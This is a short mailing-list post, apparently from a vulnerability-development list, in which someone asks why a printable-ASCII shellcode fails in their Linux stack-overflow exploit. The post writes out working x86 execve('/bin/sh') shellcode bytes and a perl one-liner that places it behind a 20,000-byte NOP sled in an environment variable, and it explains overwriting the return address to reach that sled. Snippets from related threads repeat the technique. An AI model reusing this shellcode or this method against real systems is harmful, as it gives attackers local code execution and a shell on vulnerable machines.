Re: Re: Linux restricted ASCII Shellcode



I'm exploiting the stack overflow inserting the shellcode in a environment variable:

export SHELLCODE=`perl -e 'print "\x90"x20000'``perl -e 'print "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"'`

And then overwriting de RET address to point somewhere in the NOP section of "SHELLCODE". Pretty simple.
That works perfectly.

But if I try with this environment variable:

export SHELLCODE=`perl -e 'print "\x90"x20000'``perl -e 'print "LLLLZhmeqrX5meqrHTVPPWRPPaQVRSPGWDOfhAMfXf5ECfPDVUajcX0Dob0TodjdY0LohfhmNfXf1Dol0topjYY0Loq0toq0totjJX0Dou0tou0TovjFX0Dow0towjhXfRhnKshhBabivERSvT29"'`

This do not work. I have tryed with many different ASCII shellcodes all of them ripped from examples in C style.
What I'm doing wrong?






Relevant Pages

  • Re: Some help With BOF Exploits Writing.
    ... The return address should be before your shellcode, ... Bunch of nop instructions: 0x90, that do nothing, so execution goes to ... by using the stack pointer esp. ... //calculate ret, ...
    (Vuln-Dev)
  • Re: IIS 5.0 WebDAV -Proof of concept-. Fully documented.
    ... This is not the only unicode exploit though, ... Did you use the % character in your shellcode? ... find any occurrences of our ascii string (i.e. ... This RET address is variable, ...
    (Bugtraq)
  • Re: Linux restricted ASCII Shellcode
    ... Here you have you shellcode in ascii format. ... AFAIK when EIP is pointing somewhere in the NOP sled, no matter how the shellcode is aligned... ... Is anyone able to convert this to pure ASCII or giving me a working pure ASCII shellcode or helping me understand why all the pure ascii shellcodes are failing in my exploit? ...
    (Vuln-Dev)
  • Re: about shell code(expoit code) detector...
    ... so one scanning for an unusually high number of 90h in a request would ... > trigger a possible shellcode injection. ... You can use other operation than NOP. ...
    (Focus-IDS)
  • Re: controlling ebp/eip of a frame, does it always lead to possible code execution?
    ... The shellcode should be executed. ... >(gdb) f 3 ... >a valid address and execute the exploit again: ... >0xbfbff448: nop ...
    (Vuln-Dev)